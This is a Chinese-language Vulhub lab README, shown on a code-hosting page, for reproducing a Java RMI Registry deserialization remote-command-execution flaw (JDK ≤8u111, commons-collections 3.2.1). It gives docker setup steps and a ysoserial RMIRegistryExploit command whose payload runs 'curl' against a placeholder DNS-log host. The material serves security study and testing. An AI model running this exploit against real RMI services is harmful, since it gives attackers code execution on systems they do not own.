aaronxu/vulhub
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
main
vulhub/java/rmi-registry-bind-deserialization/README.zh-cn.md
Aaron 63285f61aa
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Details
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Details
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Details
Vulhub Docker Image CI / images-test (push) Has been cancelled
Details
first commit
2025-09-06 16:08:15 +08:00

34 lines
1.2 KiB
Markdown
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Java ≤JDK 8u111 RMI Registry 反序列化命令执行
Java Remote Method InvocationRMI是Java中用于远程过程调用的机制。尽管远程绑定通常是被禁用的但RMI Registry中包含一个可被利用的远程绑定功能。攻击者可以在绑定过程中通过伪造序列化数据实现Remote接口或动态代理实现了Remote接口的对象使Registry在对数据进行反序列化时触发相应的利用链。本环境使用commons-collections:3.2.1进行演示。
参考链接:
- <https://www.rapid7.com/db/modules/exploit/multi/misc/java_rmi_server>
- <https://github.com/frohoff/ysoserial>
## 环境搭建
执行如下命令编译及启动RMI Registry和服务器
```
docker compose build
docker compose run -e RMIIP=your-ip -p 1099:1099 rmi
```
`your-ip`替换为你的服务器IP地址客户端将使用此IP连接服务器。
环境启动后RMI Registry将监听在1099端口。
## 漏洞复现
使用ysoserial的exploit包中的RMIRegistryExploit进行攻击
```bash
java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit your-ip 1099 CommonsCollections6 "curl your-dnslog-server"
```
![](1.png)
Registry会返回报错这是正常现象命令仍会成功执行。
Reference in New Issue View Git Blame Copy Permalink